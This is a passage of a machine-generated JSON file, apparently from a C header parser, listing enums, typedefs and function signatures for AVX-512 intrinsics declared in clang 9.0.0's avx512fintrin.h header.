"value": 109 }, { "tag": "field", "name": "_MM_PERM_BCDC", "value": 110 }, { "tag": "field", "name": "_MM_PERM_BCDD", "value": 111 }, { "tag": "field", "name": "_MM_PERM_BDAA", "value": 112 }, { "tag": "field", "name": "_MM_PERM_BDAB", "value": 113 }, { "tag": "field", "name": "_MM_PERM_BDAC", "value": 114 }, { "tag": "field", "name": "_MM_PERM_BDAD", "value": 115 }, { "tag": "field", "name": "_MM_PERM_BDBA", "value": 116 }, { "tag": "field", "name": "_MM_PERM_BDBB", "value": 117 }, { "tag": "field", "name": "_MM_PERM_BDBC", "value": 118 }, { "tag": "field", "name": "_MM_PERM_BDBD", "value": 119 }, { "tag": "field", "name": "_MM_PERM_BDCA", "value": 120 }, { "tag": "field", "name": "_MM_PERM_BDCB", "value": 121 }, { "tag": "field", "name": "_MM_PERM_BDCC", "value": 122 }, { "tag": "field", "name": "_MM_PERM_BDCD", "value": 123 }, { "tag": "field", "name": "_MM_PERM_BDDA", "value": 124 }, { "tag": "field", "name": "_MM_PERM_BDDB", "value": 125 }, { "tag": "field", "name": "_MM_PERM_BDDC", "value": 126 }, { "tag": "field", "name": "_MM_PERM_BDDD", "value": 127 }, { "tag": "field", "name": "_MM_PERM_CAAA", "value": 128 }, { "tag": "field", "name": "_MM_PERM_CAAB", "value": 129 }, { "tag": "field", "name": "_MM_PERM_CAAC", "value": 130 }, { "tag": "field", "name": "_MM_PERM_CAAD", "value": 131 }, { "tag": "field", "name": "_MM_PERM_CABA", "value": 132 }, { "tag": "field", "name": "_MM_PERM_CABB", "value": 133 }, { "tag": "field", "name": "_MM_PERM_CABC", "value": 134 }, { "tag": "field", "name": "_MM_PERM_CABD", "value": 135 }, { "tag": "field", "name": "_MM_PERM_CACA", "value": 136 }, { "tag": "field", "name": "_MM_PERM_CACB", "value": 137 }, { "tag": "field", "name": "_MM_PERM_CACC", "value": 138 }, { "tag": "field", "name": "_MM_PERM_CACD", "value": 139 }, { "tag": "field", "name": "_MM_PERM_CADA", "value": 140 }, { "tag": "field", "name": "_MM_PERM_CADB", "value": 141 }, { "tag": "field", "name": "_MM_PERM_CADC", "value": 142 }, { "tag": "field", "name": "_MM_PERM_CADD", "value": 143 }, { "tag": "field", "name": "_MM_PERM_CBAA", "value": 144 }, { "tag": "field", "name": "_MM_PERM_CBAB", "value": 145 }, { "tag": "field", "name": "_MM_PERM_CBAC", "value": 146 }, { "tag": "field", "name": "_MM_PERM_CBAD", "value": 147 }, { "tag": "field", "name": "_MM_PERM_CBBA", "value": 148 }, { "tag": "field", "name": "_MM_PERM_CBBB", "value": 149 }, { "tag": "field", "name": "_MM_PERM_CBBC", "value": 150 }, { "tag": "field", "name": "_MM_PERM_CBBD", "value": 151 }, { "tag": "field", "name": "_MM_PERM_CBCA", "value": 152 }, { "tag": "field", "name": "_MM_PERM_CBCB", "value": 153 }, { "tag": "field", "name": "_MM_PERM_CBCC", "value": 154 }, { "tag": "field", "name": "_MM_PERM_CBCD", "value": 155 }, { "tag": "field", "name": "_MM_PERM_CBDA", "value": 156 }, { "tag": "field", "name": "_MM_PERM_CBDB", "value": 157 }, { "tag": "field", "name": "_MM_PERM_CBDC", "value": 158 }, { "tag": "field", "name": "_MM_PERM_CBDD", "value": 159 }, { "tag": "field", "name": "_MM_PERM_CCAA", "value": 160 }, { "tag": "field", "name": "_MM_PERM_CCAB", "value": 161 }, { "tag": "field", "name": "_MM_PERM_CCAC", "value": 162 }, { "tag": "field", "name": "_MM_PERM_CCAD", "value": 163 }, { "tag": "field", "name": "_MM_PERM_CCBA", "value": 164 }, { "tag": "field", "name": "_MM_PERM_CCBB", "value": 165 }, { "tag": "field", "name": "_MM_PERM_CCBC", "value": 166 }, { "tag": "field", "name": "_MM_PERM_CCBD", "value": 167 }, { "tag": "field", "name": "_MM_PERM_CCCA", "value": 168 }, { "tag": "field", "name": "_MM_PERM_CCCB", "value": 169 }, { "tag": "field", "name": "_MM_PERM_CCCC", "value": 170 }, { "tag": "field", "name": "_MM_PERM_CCCD", "value": 171 }, { "tag": "field", "name": "_MM_PERM_CCDA", "value": 172 }, { "tag": "field", "name": "_MM_PERM_CCDB", "value": 173 }, { "tag": "field", "name": "_MM_PERM_CCDC", "value": 174 }, { "tag": "field", "name": "_MM_PERM_CCDD", "value": 175 }, { "tag": "field", "name": "_MM_PERM_CDAA", "value": 176 }, { "tag": "field", "name": "_MM_PERM_CDAB", "value": 177 }, { "tag": "field", "name": "_MM_PERM_CDAC", "value": 178 }, { "tag": "field", "name": "_MM_PERM_CDAD", "value": 179 }, { "tag": "field", "name": "_MM_PERM_CDBA", "value": 180 }, { "tag": "field", "name": "_MM_PERM_CDBB", "value": 181 }, { "tag": "field", "name": "_MM_PERM_CDBC", "value": 182 }, { "tag": "field", "name": "_MM_PERM_CDBD", "value": 183 }, { "tag": "field", "name": "_MM_PERM_CDCA", "value": 184 }, { "tag": "field", "name": "_MM_PERM_CDCB", "value": 185 }, { "tag": "field", "name": "_MM_PERM_CDCC", "value": 186 }, { "tag": "field", "name": "_MM_PERM_CDCD", "value": 187 }, { "tag": "field", "name": "_MM_PERM_CDDA", "value": 188 }, { "tag": "field", "name": "_MM_PERM_CDDB", "value": 189 }, { "tag": "field", "name": "_MM_PERM_CDDC", "value": 190 }, { "tag": "field", "name": "_MM_PERM_CDDD", "value": 191 }, { "tag": "field", "name": "_MM_PERM_DAAA", "value": 192 }, { "tag": "field", "name": "_MM_PERM_DAAB", "value": 193 }, { "tag": "field", "name": "_MM_PERM_DAAC", "value": 194 }, { "tag": "field", "name": "_MM_PERM_DAAD", "value": 195 }, { "tag": "field", "name": "_MM_PERM_DABA", "value": 196 }, { "tag": "field", "name": "_MM_PERM_DABB", "value": 197 }, { "tag": "field", "name": "_MM_PERM_DABC", "value": 198 }, { "tag": "field", "name": "_MM_PERM_DABD", "value": 199 }, { "tag": "field", "name": "_MM_PERM_DACA", "value": 200 }, { "tag": "field", "name": "_MM_PERM_DACB", "value": 201 }, { "tag": "field", "name": "_MM_PERM_DACC", "value": 202 }, { "tag": "field", "name": "_MM_PERM_DACD", "value": 203 }, { "tag": "field", "name": "_MM_PERM_DADA", "value": 204 }, { "tag": "field", "name": "_MM_PERM_DADB", "value": 205 }, { "tag": "field", "name": "_MM_PERM_DADC", "value": 206 }, { "tag": "field", "name": "_MM_PERM_DADD", "value": 207 }, { "tag": "field", "name": "_MM_PERM_DBAA", "value": 208 }, { "tag": "field", "name": "_MM_PERM_DBAB", "value": 209 }, { "tag": "field", "name": "_MM_PERM_DBAC", "value": 210 }, { "tag": "field", "name": "_MM_PERM_DBAD", "value": 211 }, { "tag": "field", "name": "_MM_PERM_DBBA", "value": 212 }, { "tag": "field", "name": "_MM_PERM_DBBB", "value": 213 }, { "tag": "field", "name": "_MM_PERM_DBBC", "value": 214 }, { "tag": "field", "name": "_MM_PERM_DBBD", "value": 215 }, { "tag": "field", "name": "_MM_PERM_DBCA", "value": 216 }, { "tag": "field", "name": "_MM_PERM_DBCB", "value": 217 }, { "tag": "field", "name": "_MM_PERM_DBCC", "value": 218 }, { "tag": "field", "name": "_MM_PERM_DBCD", "value": 219 }, { "tag": "field", "name": "_MM_PERM_DBDA", "value": 220 }, { "tag": "field", "name": "_MM_PERM_DBDB", "value": 221 }, { "tag": "field", "name": "_MM_PERM_DBDC", "value": 222 }, { "tag": "field", "name": "_MM_PERM_DBDD", "value": 223 }, { "tag": "field", "name": "_MM_PERM_DCAA", "value": 224 }, { "tag": "field", "name": "_MM_PERM_DCAB", "value": 225 }, { "tag": "field", "name": "_MM_PERM_DCAC", "value": 226 }, { "tag": "field", "name": "_MM_PERM_DCAD", "value": 227 }, { "tag": "field", "name": "_MM_PERM_DCBA", "value": 228 }, { "tag": "field", "name": "_MM_PERM_DCBB", "value": 229 }, { "tag": "field", "name": "_MM_PERM_DCBC", "value": 230 }, { "tag": "field", "name": "_MM_PERM_DCBD", "value": 231 }, { "tag": "field", "name": "_MM_PERM_DCCA", "value": 232 }, { "tag": "field", "name": "_MM_PERM_DCCB", "value": 233 }, { "tag": "field", "name": "_MM_PERM_DCCC", "value": 234 }, { "tag": "field", "name": "_MM_PERM_DCCD", "value": 235 }, { "tag": "field", "name": "_MM_PERM_DCDA", "value": 236 }, { "tag": "field", "name": "_MM_PERM_DCDB", "value": 237 }, { "tag": "field", "name": "_MM_PERM_DCDC", "value": 238 }, { "tag": "field", "name": "_MM_PERM_DCDD", "value": 239 }, { "tag": "field", "name": "_MM_PERM_DDAA", "value": 240 }, { "tag": "field", "name": "_MM_PERM_DDAB", "value": 241 }, { "tag": "field", "name": "_MM_PERM_DDAC", "value": 242 }, { "tag": "field", "name": "_MM_PERM_DDAD", "value": 243 }, { "tag": "field", "name": "_MM_PERM_DDBA", "value": 244 }, { "tag": "field", "name": "_MM_PERM_DDBB", "value": 245 }, { "tag": "field", "name": "_MM_PERM_DDBC", "value": 246 }, { "tag": "field", "name": "_MM_PERM_DDBD", "value": 247 }, { "tag": "field", "name": "_MM_PERM_DDCA", "value": 248 }, { "tag": "field", "name": "_MM_PERM_DDCB", "value": 249 }, { "tag": "field", "name": "_MM_PERM_DDCC", "value": 250 }, { "tag": "field", "name": "_MM_PERM_DDCD", "value": 251 }, { "tag": "field", "name": "_MM_PERM_DDDA", "value": 252 }, { "tag": "field", "name": "_MM_PERM_DDDB", "value": 253 }, { "tag": "field", "name": "_MM_PERM_DDDC", "value": 254 }, { "tag": "field", "name": "_MM_PERM_DDDD", "value": 255 }] }, { "tag": "typedef", "ns": 0, "name": "_MM_PERM_ENUM", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:148:3", "type": { "tag": ":enum", "name": "", "id": 47 } }, { "tag": "enum", "ns": 0, "name": "", "id": 48, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:150:9", "fields": [{ "tag": "field", "name": "_MM_MANT_NORM_1_2", "value": 0 }, { "tag": "field", "name": "_MM_MANT_NORM_p5_2", "value": 1 }, { "tag": "field", "name": "_MM_MANT_NORM_p5_1", "value": 2 }, { "tag": "field", "name": "_MM_MANT_NORM_p75_1p5", "value": 3 }] }, { "tag": "typedef", "ns": 0, "name": "_MM_MANTISSA_NORM_ENUM", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:156:3", "type": { "tag": ":enum", "name": "", "id": 48 } }, { "tag": "enum", "ns": 0, "name": "", "id": 49, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:158:9", "fields": [{ "tag": "field", "name": "_MM_MANT_SIGN_src", "value": 0 }, { "tag": "field", "name": "_MM_MANT_SIGN_zero", "value": 1 }, { "tag": "field", "name": "_MM_MANT_SIGN_nan", "value": 2 }] }, { "tag": "typedef", "ns": 0, "name": "_MM_MANTISSA_SIGN_ENUM", "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:163:3", "type": { "tag": ":enum", "name": "", "id": 49 } }, { "tag": "function", "name": "_mm512_setzero_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:173:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_undefined_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:181:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_undefined", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:187:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_undefined_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:193:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_undefined_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:199:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_broadcastd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:205:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_broadcastd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:212:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_broadcastd_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:220:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_broadcastq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:228:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_broadcastq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:235:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_broadcastq_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:244:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_setzero_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:253:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_setzero_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:262:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_set1_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:268:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_set1_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:275:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_set1_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:281:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_set1_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:295:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_set1_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:305:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__s", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_set1_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:313:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_set1_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:321:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__d", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_set1_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:327:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_broadcastss_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:335:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_set4_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:342:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_set4_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:350:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_set4_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:358:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_set4_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:365:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__C", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__D", "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_broadcastsd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:385:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_castpd256_pd512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:394:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_castps256_ps512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:400:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_castpd512_pd128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:407:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm512_castpd512_pd256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:413:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm512_castps512_ps128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:419:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm512_castps512_ps256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:425:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm512_castpd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:431:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_castpd_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:437:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_castpd128_pd512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:443:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_castps_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:449:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_castps_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:455:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_castps128_ps512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:461:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_castsi128_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:467:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_castsi256_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:473:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_castsi512_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:479:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_castsi512_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:485:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_castsi512_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:491:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_castsi512_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:497:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_int2mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:503:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_mask2int", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:509:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__mmask16" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_zextpd128_pd512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:528:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_zextpd256_pd512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:547:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_zextps128_ps512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:565:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_zextps256_ps512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:583:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_zextsi128_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:601:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_zextsi256_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:619:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_and_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:626:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_and_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:632:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__src", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__k", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_and_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:640:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__k", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__a", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__b", 